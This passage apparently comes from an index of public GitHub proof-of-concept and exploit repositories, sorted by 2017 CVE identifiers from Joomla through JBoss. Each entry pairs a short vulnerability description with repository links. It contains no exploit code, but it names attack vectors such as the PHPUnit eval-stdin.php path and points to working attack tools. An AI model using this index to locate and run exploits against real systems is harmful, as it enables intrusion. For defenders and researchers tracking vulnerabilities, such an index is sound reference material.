- [BaptisteContreras/CVE-2017-8917-Joomla](https://github.com/BaptisteContreras/CVE-2017-8917-Joomla)
- [gloliveira1701/Joomblah](https://github.com/gloliveira1701/Joomblah)

### CVE-2017-9096 (2017-11-08)

The XML parsers in iText before 5.5.12 and 7.x before 7.0.3 do not disable external entities, which might allow remote attackers to conduct XML external entity (XXE) attacks via a crafted PDF.

- [jakabakos/CVE-2017-9096-iText-XXE](https://github.com/jakabakos/CVE-2017-9096-iText-XXE)

### CVE-2017-9097 (2017-06-16)

In Anti-Web through 3.8.7, as used on NetBiter FGW200 devices through 3.21.2, WS100 devices through 3.30.5, EC150 devices through 1.40.0, WS200 devices through 3.30.4, EC250 devices through 1.40.0, and other products, an LFI vulnerability allows a remote attacker to read or modify files through a path traversal technique, as demonstrated by reading the password file, or using the template parameter to cgi-bin/write.cgi to write to an arbitrary file.

- [MDudek-ICS/AntiWeb_testing-Suite](https://github.com/MDudek-ICS/AntiWeb_testing-Suite)

### CVE-2017-9101 (2017-05-21)

import.php (aka the Phonebook import feature) in PlaySMS 1.4 allows remote code execution via vectors involving the User-Agent HTTP header and PHP code in the name of a file.

- [jasperla/CVE-2017-9101](https://github.com/jasperla/CVE-2017-9101)

### CVE-2017-9248 (2017-07-03)

Telerik.Web.UI.dll in Progress Telerik UI for ASP.NET AJAX before R2 2017 SP1 and Sitefinity before 10.0.6412.0 does not properly protect Telerik.Web.UI.DialogParametersEncryptionKey or the MachineKey, which makes it easier for remote attackers to defeat cryptographic protection mechanisms, leading to a MachineKey leak, arbitrary file uploads or downloads, XSS, or ASP.NET ViewState compromise.

- [bao7uo/dp_crypto](https://github.com/bao7uo/dp_crypto)
- [capt-meelo/Telewreck](https://github.com/capt-meelo/Telewreck)
- [ictnamanh/CVE-2017-9248](https://github.com/ictnamanh/CVE-2017-9248)
- [oldboysonnt/dp](https://github.com/oldboysonnt/dp)
- [blacklanternsecurity/dp_cryptomg](https://github.com/blacklanternsecurity/dp_cryptomg)
- [cehamod/UI_CVE-2017-9248](https://github.com/cehamod/UI_CVE-2017-9248)
- [hlong12042/CVE-2017-9248](https://github.com/hlong12042/CVE-2017-9248)

### CVE-2017-9417 (2017-06-03)

Broadcom BCM43xx Wi-Fi chips allow remote attackers to execute arbitrary code via unspecified vectors, aka the "Broadpwn" issue.

- [mailinneberg/Broadpwn](https://github.com/mailinneberg/Broadpwn)

### CVE-2017-9430 (2017-06-05)

Stack-based buffer overflow in dnstracer through 1.9 allows attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a command line with a long name argument that is mishandled in a strcpy call for argv[0]. An example threat model is a web application that launches dnstracer with an untrusted name string.

- [homjxi0e/CVE-2017-9430](https://github.com/homjxi0e/CVE-2017-9430)
- [j0lama/Dnstracer-1.9-Fix](https://github.com/j0lama/Dnstracer-1.9-Fix)

### CVE-2017-9476 (2017-07-31)

The Comcast firmware on Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421733-160420a-CMCST); Cisco DPC3939 (firmware version dpc3939-P20-18-v303r20421746-170221a-CMCST); and Arris TG1682G (eMTA&DOCSIS version 10.0.132.SIP.PC20.CT, software version TG1682_2.2p7s2_PROD_sey) devices makes it easy for remote attackers to determine the hidden SSID and passphrase for a Home Security Wi-Fi network.

- [wiire-a/CVE-2017-9476](https://github.com/wiire-a/CVE-2017-9476)

### CVE-2017-9506 (2017-08-23)

The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).

- [random-robbie/Jira-Scan](https://github.com/random-robbie/Jira-Scan)
- [pwn1sher/jira-ssrf](https://github.com/pwn1sher/jira-ssrf)
- [labsbots/CVE-2017-9506](https://github.com/labsbots/CVE-2017-9506)

### CVE-2017-9544 (2017-06-12)

There is a remote stack-based buffer overflow (SEH) in register.ghp in EFS Software Easy Chat Server versions 2.0 to 3.1. By sending an overly long username string to registresult.htm for registering the user, an attacker may be able to execute arbitrary code.

- [adenkiewicz/CVE-2017-9544](https://github.com/adenkiewicz/CVE-2017-9544)

### CVE-2017-9554 (2017-07-24)

An information exposure vulnerability in forget_passwd.cgi in Synology DiskStation Manager (DSM) before 6.1.3-15152 allows remote attackers to enumerate valid usernames via unspecified vectors.

- [rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-](https://github.com/rfcl/Synology-DiskStation-User-Enumeration-CVE-2017-9554-)
- [Ez0-yf/CVE-2017-9554-Exploit-Tool](https://github.com/Ez0-yf/CVE-2017-9554-Exploit-Tool)

### CVE-2017-9606 (2017-06-15)

Infotecs ViPNet Client and Coordinator before 4.3.2-42442 allow local users to gain privileges by placing a Trojan horse ViPNet update file in the update folder. The attack succeeds because of incorrect folder permissions in conjunction with a lack of integrity and authenticity checks.

- [Houl777/CVE-2017-9606](https://github.com/Houl777/CVE-2017-9606)

### CVE-2017-9608 (2017-12-27)

The dnxhd decoder in FFmpeg before 3.2.6, and 3.3.x before 3.3.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted mov file.

- [LaCinquette/practice-22-23](https://github.com/LaCinquette/practice-22-23)

### CVE-2017-9609 (2017-07-17)

Cross-site scripting (XSS) vulnerability in Blackcat CMS 1.2 allows remote authenticated users to inject arbitrary web script or HTML via the map_language parameter to backend/pages/lang_settings.php.

- [faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Blackcat-cms-v1.2-xss-POC-by-Provensec-llc)

### CVE-2017-9627 (2017-07-07)

An Uncontrolled Resource Consumption issue was discovered in Schneider Electric Wonderware ArchestrA Logger, versions 2017.426.2307.1 and prior. The uncontrolled resource consumption vulnerability could allow an attacker to exhaust the memory resources of the machine, causing a denial of service.

- [USSCltd/aaLogger](https://github.com/USSCltd/aaLogger)

### CVE-2017-9757 (2017-06-19)

IPFire 2.19 has a Remote Command Injection vulnerability in ids.cgi via the OINKCODE parameter, which is mishandled by a shell. This can be exploited directly by authenticated users, or through CSRF.

- [peterleiva/CVE-2017-9757](https://github.com/peterleiva/CVE-2017-9757)

### CVE-2017-9769 (2017-08-02)

A specially crafted IOCTL can be issued to the rzpnk.sys driver in Razer Synapse 2.20.15.1104 that is forwarded to ZwOpenProcess allowing a handle to be opened to an arbitrary process.

- [kkent030315/CVE-2017-9769](https://github.com/kkent030315/CVE-2017-9769)

### CVE-2017-9779 (2017-09-07)

OCaml compiler allows attackers to have unspecified impact via unknown vectors, a similar issue to CVE-2017-9772 "but with much less impact."

- [homjxi0e/CVE-2017-9779](https://github.com/homjxi0e/CVE-2017-9779)

### CVE-2017-9791 (2017-07-10)

The Struts 1 plugin in Apache Struts 2.1.x and 2.3.x might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.

- [IanSmith123/s2-048](https://github.com/IanSmith123/s2-048)
- [dragoneeg/Struts2-048](https://github.com/dragoneeg/Struts2-048)
- [xfer0/CVE-2017-9791](https://github.com/xfer0/CVE-2017-9791)

### CVE-2017-9798 (2017-09-18)

Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2.2.34 and 2.4.x through 2.4.27. The attacker sends an unauthenticated OPTIONS HTTP request when attempting to read secret data. This is a use-after-free issue and thus secret data is not always sent, and the specific data depends on many factors including configuration. Exploitation with .htaccess can be blocked with a patch to the ap_limit_section function in server/core.c.

- [nitrado/CVE-2017-9798](https://github.com/nitrado/CVE-2017-9798)
- [pabloec20/optionsbleed](https://github.com/pabloec20/optionsbleed)
- [l0n3rs/CVE-2017-9798](https://github.com/l0n3rs/CVE-2017-9798)
- [brokensound77/OptionsBleed-POC-Scanner](https://github.com/brokensound77/OptionsBleed-POC-Scanner)

### CVE-2017-9805 (2017-09-15)

The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type filtering, which can lead to Remote Code Execution when deserializing XML payloads.

- [luc10/struts-rce-cve-2017-9805](https://github.com/luc10/struts-rce-cve-2017-9805)
- [hahwul/struts2-rce-cve-2017-9805-ruby](https://github.com/hahwul/struts2-rce-cve-2017-9805-ruby)
- [mazen160/struts-pwn_CVE-2017-9805](https://github.com/mazen160/struts-pwn_CVE-2017-9805)
- [Lone-Ranger/apache-struts-pwn_CVE-2017-9805](https://github.com/Lone-Ranger/apache-struts-pwn_CVE-2017-9805)
- [0x00-0x00/-CVE-2017-9805](https://github.com/0x00-0x00/-CVE-2017-9805)
- [BeyondCy/S2-052](https://github.com/BeyondCy/S2-052)
- [chrisjd20/cve-2017-9805.py](https://github.com/chrisjd20/cve-2017-9805.py)
- [UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-](https://github.com/UbuntuStrike/struts_rest_rce_fuzz-CVE-2017-9805-)
- [UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit](https://github.com/UbuntuStrike/CVE-2017-9805-Apache-Struts-Fuzz-N-Sploit)
- [AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378](https://github.com/AvishkaSenadheera/CVE-2017-9805---Documentation---IT19143378)
- [wifido/CVE-2017-9805-Exploit](https://github.com/wifido/CVE-2017-9805-Exploit)
- [rvermeulen/apache-struts-cve-2017-9805](https://github.com/rvermeulen/apache-struts-cve-2017-9805)
- [jongmartinez/-CVE-2017-9805-](https://github.com/jongmartinez/-CVE-2017-9805-)
- [z3bd/CVE-2017-9805](https://github.com/z3bd/CVE-2017-9805)
- [0xd3vil/CVE-2017-9805-Exploit](https://github.com/0xd3vil/CVE-2017-9805-Exploit)
- [Shakun8/CVE-2017-9805](https://github.com/Shakun8/CVE-2017-9805)

### CVE-2017-9822 (2017-07-20)

DNN (aka DotNetNuke) before 9.1.1 has Remote Code Execution via a cookie, aka "2017-08 (Critical) Possible remote code execution on DNN sites."

- [murataydemir/CVE-2017-9822](https://github.com/murataydemir/CVE-2017-9822)

### CVE-2017-9830 (2017-06-27)

Remote Code Execution is possible in Code42 CrashPlan 5.4.x via the org.apache.commons.ssl.rmi.DateRMI Java class, because (upon instantiation) it creates an RMI server that listens on a TCP port and deserializes objects sent by TCP clients.

- [securifera/CVE-2017-9830](https://github.com/securifera/CVE-2017-9830)

### CVE-2017-9833 (2017-06-24)

/cgi-bin/wapopen in Boa 0.94.14rc21 allows the injection of "../.." using the FILECAMERA variable (sent by GET) to read files with root privileges. NOTE: multiple third parties report that this is a system-integrator issue (e.g., a vulnerability on one type of camera) because Boa does not include any wapopen program or any code to read a FILECAMERA variable.

- [anldori/CVE-2017-9833](https://github.com/anldori/CVE-2017-9833)

### CVE-2017-9841 (2017-06-27)

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.

- [mbrasile/CVE-2017-9841](https://github.com/mbrasile/CVE-2017-9841)
- [RandomRobbieBF/phpunit-brute](https://github.com/RandomRobbieBF/phpunit-brute)
- [cyberharsh/Php-unit-CVE-2017-9841](https://github.com/cyberharsh/Php-unit-CVE-2017-9841)
- [ludy-dev/PHPUnit_eval-stdin_RCE](https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE)
- [incogbyte/laravel-phpunit-rce-masscaner](https://github.com/incogbyte/laravel-phpunit-rce-masscaner)
- [akr3ch/CVE-2017-9841](https://github.com/akr3ch/CVE-2017-9841)
- [p1ckzi/CVE-2017-9841](https://github.com/p1ckzi/CVE-2017-9841)
- [jax7sec/CVE-2017-9841](https://github.com/jax7sec/CVE-2017-9841)
- [mileticluka1/eval-stdin](https://github.com/mileticluka1/eval-stdin)
- [dream434/CVE-2017-9841-](https://github.com/dream434/CVE-2017-9841-)
- [MadExploits/PHPunit-Exploit](https://github.com/MadExploits/PHPunit-Exploit)
- [MrG3P5/CVE-2017-9841](https://github.com/MrG3P5/CVE-2017-9841)
- [Chocapikk/CVE-2017-9841](https://github.com/Chocapikk/CVE-2017-9841)

### CVE-2017-9934 (2017-07-17)

Missing CSRF token checks and improper input validation in Joomla! CMS 1.7.3 through 3.7.2 lead to an XSS vulnerability.

- [xyringe/CVE-2017-9934](https://github.com/xyringe/CVE-2017-9934)

### CVE-2017-9947 (2017-10-23)

A vulnerability has been identified in Siemens APOGEE PXC and TALON TC BACnet Automation Controllers in all versions <V3.5. A directory traversal vulnerability could allow a remote attacker with network access to the integrated web server (80/tcp and 443/tcp) to obtain information on the structure of the file system of the affected devices.

- [RoseSecurity/APOLOGEE](https://github.com/RoseSecurity/APOLOGEE)

### CVE-2017-9999
- [homjxi0e/CVE-2017-9999_bypassing_General_Firefox](https://github.com/homjxi0e/CVE-2017-9999_bypassing_General_Firefox)

### CVE-2017-10235 (2017-08-08)

Vulnerability in the Oracle VM VirtualBox component of Oracle Virtualization (subcomponent: Core). The supported version that is affected is Prior to 5.1.24. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox as well as unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data. CVSS 3.0 Base Score 6.7 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H).

- [fundacion-sadosky/vbox_cve_2017_10235](https://github.com/fundacion-sadosky/vbox_cve_2017_10235)

### CVE-2017-10271 (2017-10-19)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

- [1337g/CVE-2017-10271](https://github.com/1337g/CVE-2017-10271)
- [s3xy/CVE-2017-10271](https://github.com/s3xy/CVE-2017-10271)
- [ZH3FENG/PoCs-Weblogic_2017_10271](https://github.com/ZH3FENG/PoCs-Weblogic_2017_10271)
- [c0mmand3rOpSec/CVE-2017-10271](https://github.com/c0mmand3rOpSec/CVE-2017-10271)
- [Luffin/CVE-2017-10271](https://github.com/Luffin/CVE-2017-10271)
- [cjjduck/weblogic_wls_wsat_rce](https://github.com/cjjduck/weblogic_wls_wsat_rce)
- [kkirsche/CVE-2017-10271](https://github.com/kkirsche/CVE-2017-10271)
- [pssss/CVE-2017-10271](https://github.com/pssss/CVE-2017-10271)
- [SuperHacker-liuan/cve-2017-10271-poc](https://github.com/SuperHacker-liuan/cve-2017-10271-poc)
- [peterpeter228/Oracle-WebLogic-CVE-2017-10271](https://github.com/peterpeter228/Oracle-WebLogic-CVE-2017-10271)
- [Cymmetria/weblogic_honeypot](https://github.com/Cymmetria/weblogic_honeypot)
- [JackyTsuuuy/weblogic_wls_rce_poc-exp](https://github.com/JackyTsuuuy/weblogic_wls_rce_poc-exp)
- [lonehand/Oracle-WebLogic-CVE-2017-10271-master](https://github.com/lonehand/Oracle-WebLogic-CVE-2017-10271-master)
- [shack2/javaserializetools](https://github.com/shack2/javaserializetools)
- [ETOCheney/JavaDeserialization](https://github.com/ETOCheney/JavaDeserialization)
- [r4b3rt/CVE-2017-10271](https://github.com/r4b3rt/CVE-2017-10271)
- [cved-sources/cve-2017-10271](https://github.com/cved-sources/cve-2017-10271)
- [XHSecurity/Oracle-WebLogic-CVE-2017-10271](https://github.com/XHSecurity/Oracle-WebLogic-CVE-2017-10271)
- [kbsec/Weblogic_Wsat_RCE](https://github.com/kbsec/Weblogic_Wsat_RCE)
- [SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961](https://github.com/SkyBlueEternal/CNVD-C-2019-48814-CNNVD-201904-961)
- [Yuusuke4/WebLogic_CNVD_C_2019_48814](https://github.com/Yuusuke4/WebLogic_CNVD_C_2019_48814)
- [7kbstorm/WebLogic_CNVD_C2019_48814](https://github.com/7kbstorm/WebLogic_CNVD_C2019_48814)
- [ianxtianxt/-CVE-2017-10271-](https://github.com/ianxtianxt/-CVE-2017-10271-)
- [testwc/CVE-2017-10271](https://github.com/testwc/CVE-2017-10271)
- [Al1ex/CVE-2017-10271](https://github.com/Al1ex/CVE-2017-10271)
- [pizza-power/weblogic-CVE-2019-2729-POC](https://github.com/pizza-power/weblogic-CVE-2019-2729-POC)
- [KKsdall/7kbstormq](https://github.com/KKsdall/7kbstormq)

### CVE-2017-10352 (2017-10-19)

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 and 12.2.1.3.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. While the vulnerability is in Oracle WebLogic Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle WebLogic Server as well as unauthorized update, insert or delete access to some of Oracle WebLogic Server accessible data and unauthorized read access to a subset of Oracle WebLogic Server accessible data. CVSS 3.0 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H).

- [bigsizeme/weblogic-XMLDecoder](https://github.com/bigsizeme/weblogic-XMLDecoder)

### CVE-2017-10366 (2017-10-19)

Vulnerability in the PeopleSoft Enterprise PT PeopleTools component of Oracle PeopleSoft Products (subcomponent: Performance Monitor). Supported versions that are affected are 8.54, 8.55 and 8.56. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PT PeopleTools. Successful attacks of this vulnerability can result in takeover of PeopleSoft Enterprise PT PeopleTools. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

- [blazeinfosec/CVE-2017-10366_peoplesoft](https://github.com/blazeinfosec/CVE-2017-10366_peoplesoft)

### CVE-2017-10617 (2017-10-13)

The ifmap service that comes bundled with Contrail has an XML External Entity (XXE) vulnerability that may allow an attacker to retrieve sensitive system files. Affected releases are Juniper Networks Contrail 2.2 prior to 2.21.4; 3.0 prior to 3.0.3.4; 3.1 prior to 3.1.4.0; 3.2 prior to 3.2.5.0. CVE-2017-10616 and CVE-2017-10617 can be chained together and have a combined CVSSv3 score of 5.8 (AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N).

- [gteissier/CVE-2017-10617](https://github.com/gteissier/CVE-2017-10617)

### CVE-2017-10661 (2017-08-19)

Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows local users to gain privileges or cause a denial of service (list corruption or use-after-free) via simultaneous file-descriptor operations that leverage improper might_cancel queueing.

- [GeneBlue/CVE-2017-10661_POC](https://github.com/GeneBlue/CVE-2017-10661_POC)

### CVE-2017-10797
- [n4xh4ck5/CVE-2017-10797](https://github.com/n4xh4ck5/CVE-2017-10797)

### CVE-2017-10952 (2017-08-29)

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Foxit Reader 8.2.0.2051. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the saveAs JavaScript function. The issue results from the lack of proper validation of user-supplied data, which can lead to writing arbitrary files into attacker controlled locations. An attacker can leverage this vulnerability to execute code under the context of the current process. Was ZDI-CAN-4518.

- [afbase/CVE-2017-10952](https://github.com/afbase/CVE-2017-10952)

### CVE-2017-11176 (2017-07-11)

The mq_notify function in the Linux kernel through 4.11.9 does not set the sock pointer to NULL upon entry into the retry logic. During a user-space close of a Netlink socket, it allows attackers to cause a denial of service (use-after-free) or possibly have unspecified other impact.

- [lexfo/cve-2017-11176](https://github.com/lexfo/cve-2017-11176)
- [DoubleMice/cve-2017-11176](https://github.com/DoubleMice/cve-2017-11176)
- [HckEX/CVE-2017-11176](https://github.com/HckEX/CVE-2017-11176)
- [leonardo1101/cve-2017-11176](https://github.com/leonardo1101/cve-2017-11176)
- [c3r34lk1ll3r/CVE-2017-11176](https://github.com/c3r34lk1ll3r/CVE-2017-11176)
- [Sama-Ayman-Mokhtar/CVE-2017-11176](https://github.com/Sama-Ayman-Mokhtar/CVE-2017-11176)

### CVE-2017-11317 (2017-08-23)

Telerik.Web.UI in Progress Telerik UI for ASP.NET AJAX before R1 2017 and R2 before R2 2017 SP2 uses weak RadAsyncUpload encryption, which allows remote attackers to perform arbitrary file uploads or execute arbitrary code.

- [bao7uo/RAU_crypto](https://github.com/bao7uo/RAU_crypto)
- [KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut](https://github.com/KasunPriyashan/Unrestricted-File-Upload-by-Weak-Encryption-affected-versions-CVE-2017-11317-Remote-Code-Execut)
- [KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation](https://github.com/KasunPriyashan/Telerik-UI-ASP.NET-AJAX-Exploitation)
- [hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik](https://github.com/hlong12042/CVE-2017-11317-and-CVE-2017-11357-in-Telerik)

### CVE-2017-11366 (2017-08-21)

components/filemanager/class.filemanager.php in Codiad before 2.8.4 is vulnerable to remote command execution because shell commands can be embedded in parameter values, as demonstrated by search_file_type.

- [hidog123/Codiad-CVE-2018-14009](https://github.com/hidog123/Codiad-CVE-2018-14009)

### CVE-2017-11427 (2019-04-17)

OneLogin PythonSAML 2.3.0 and earlier may incorrectly utilize the results of XML DOM traversal and canonicalization APIs in such a way that an attacker may be able to manipulate the SAML data without invalidating the cryptographic signature, allowing the attacker to potentially bypass authentication to SAML service providers.

- [CHYbeta/CVE-2017-11427-DEMO](https://github.com/CHYbeta/CVE-2017-11427-DEMO)

### CVE-2017-11503 (2017-07-20)

PHPMailer 5.2.23 has XSS in the "From Email Address" and "To Email Address" fields of code_generator.php.

- [wizardafric/download](https://github.com/wizardafric/download)

### CVE-2017-11519 (2017-07-21)

passwd_recovery.lua on the TP-Link Archer C9(UN)_V2_160517 allows an attacker to reset the admin password by leveraging a predictable random number generator seed. This is fixed in C9(UN)_V2_170511.

- [vakzz/tplink-CVE-2017-11519](https://github.com/vakzz/tplink-CVE-2017-11519)

### CVE-2017-11610 (2017-08-23)

The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisord namespace lookups.

- [ivanitlearning/CVE-2017-11610](https://github.com/ivanitlearning/CVE-2017-11610)
- [yaunsky/CVE-2017-11610](https://github.com/yaunsky/CVE-2017-11610)

### CVE-2017-11611 (2017-09-08)

Wolf CMS 0.8.3.1 allows Cross-Site Scripting (XSS) attacks. The vulnerability exists due to insufficient sanitization of the file name in a "create-file-popup" action, and the directory name in a "create-directory-popup" action, in the HTTP POST method to the "/plugin/file_manager/" script (aka an /admin/plugin/file_manager/browse// URI).

- [faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc](https://github.com/faizzaidi/Wolfcms-v0.8.3.1-xss-POC-by-Provensec-llc)

### CVE-2017-11774 (2017-10-13)

Microsoft Outlook 2010 SP2, Outlook 2013 SP1 and RT SP1, and Outlook 2016 allow an attacker to execute arbitrary commands, due to how Microsoft Office handles objects in memory, aka "Microsoft Outlook Security Feature Bypass Vulnerability."

- [devcoinfet/SniperRoost](https://github.com/devcoinfet/SniperRoost)

### CVE-2017-11783 (2017-10-13)

Microsoft Windows 8.1, Windows Server 2012 R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation of privilege vulnerability in the way it handles calls to Advanced Local Procedure Call (ALPC), aka "Windows Elevation of Privilege Vulnerability".

- [Sheisback/CVE-2017-11783](https://github.com/Sheisback/CVE-2017-11783)

### CVE-2017-11826 (2017-10-13)

Microsoft Office 2010, SharePoint Enterprise Server 2010, SharePoint Server 2010, Web Applications, Office Web Apps Server 2010 and 2013, Word Viewer, Word 2007, 2010, 2013 and 2016, Word Automation Services, and Office Online Server allow remote code execution when the software fails to properly handle objects in memory.

- [thatskriptkid/CVE-2017-11826](https://github.com/thatskriptkid/CVE-2017-11826)

### CVE-2017-11882 (2017-11-15)

Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11884.

- [zhouat/cve-2017-11882](https://github.com/zhouat/cve-2017-11882)
- [embedi/CVE-2017-11882](https://github.com/embedi/CVE-2017-11882)
- [Ridter/CVE-2017-11882](https://github.com/Ridter/CVE-2017-11882)
- [BlackMathIT/2017-11882_Generator](https://github.com/BlackMathIT/2017-11882_Generator)
- [rip1s/CVE-2017-11882](https://github.com/rip1s/CVE-2017-11882)
- [0x09AL/CVE-2017-11882-metasploit](https://github.com/0x09AL/CVE-2017-11882-metasploit)
- [HZachev/ABC](https://github.com/HZachev/ABC)
- [starnightcyber/CVE-2017-11882](https://github.com/starnightcyber/CVE-2017-11882)
- [Grey-Li/CVE-2017-11882](https://github.com/Grey-Li/CVE-2017-11882)
- [legendsec/CVE-2017-11882-for-Kali](https://github.com/legendsec/CVE-2017-11882-for-Kali)
- [CSC-pentest/cve-2017-11882](https://github.com/CSC-pentest/cve-2017-11882)
- [Shadowshusky/CVE-2017-11882-](https://github.com/Shadowshusky/CVE-2017-11882-)
- [rxwx/CVE-2018-0802](https://github.com/rxwx/CVE-2018-0802)
- [Ridter/RTF_11882_0802](https://github.com/Ridter/RTF_11882_0802)
- [likekabin/CVE-2017-11882](https://github.com/likekabin/CVE-2017-11882)
- [likekabin/CVE-2018-0802_CVE-2017-11882](https://github.com/likekabin/CVE-2018-0802_CVE-2017-11882)
- [herbiezimmerman/CVE-2017-11882-Possible-Remcos-Malspam](https://github.com/herbiezimmerman/CVE-2017-11882-Possible-Remcos-Malspam)
- [ChaitanyaHaritash/CVE-2017-11882](https://github.com/ChaitanyaHaritash/CVE-2017-11882)
- [qy1202/https-github.com-Ridter-CVE-2017-11882-](https://github.com/qy1202/https-github.com-Ridter-CVE-2017-11882-)
- [j0lama/CVE-2017-11882](https://github.com/j0lama/CVE-2017-11882)
- [chanbin/CVE-2017-11882](https://github.com/chanbin/CVE-2017-11882)
- [littlebin404/CVE-2017-11882](https://github.com/littlebin404/CVE-2017-11882)
- [ekgg/Overflow-Demo-CVE-2017-11882](https://github.com/ekgg/Overflow-Demo-CVE-2017-11882)
- [HaoJame/CVE-2017-11882](https://github.com/HaoJame/CVE-2017-11882)
- [ActorExpose/CVE-2017-11882](https://github.com/ActorExpose/CVE-2017-11882)
- [Retr0-code/SignHere](https://github.com/Retr0-code/SignHere)
- [lisinan988/CVE-2017-11882-exp](https://github.com/lisinan988/CVE-2017-11882-exp)
- [tzwlhack/CVE-2017-11882](https://github.com/tzwlhack/CVE-2017-11882)
- [Sunqiz/CVE-2017-11882-reproduction](https://github.com/Sunqiz/CVE-2017-11882-reproduction)
- [Abdibimantara/Maldoc-Analysis](https://github.com/Abdibimantara/Maldoc-Analysis)
- [n18dcat053-luuvannga/DetectPacket-CVE-2017-11882](https://github.com/n18dcat053-luuvannga/DetectPacket-CVE-2017-11882)
- [nhuynhuy/cve-2017-11882](https://github.com/nhuynhuy/cve-2017-11882)
- [jadeapar/Dragonfish-s-Malware-Cyber-Analysis](https://github.com/jadeapar/Dragonfish-s-Malware-Cyber-Analysis)

### CVE-2017-11907 (2017-12-12)

Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how Internet Explorer handles objects in memory, aka "Scripting Engine Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.

- [AV1080p/CVE-2017-11907](https://github.com/AV1080p/CVE-2017-11907)

### CVE-2017-12149 (2017-10-04)

In JBoss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict the classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.

- [sevck/CVE-2017-12149](https://github.com/sevck/CVE-2017-12149)
- [yunxu1/jboss-_CVE-2017-12149](https://github.com/yunxu1/jboss-_CVE-2017-12149)
- [1337g/CVE-2017-12149](https://github.com/1337g/CVE-2017-12149)
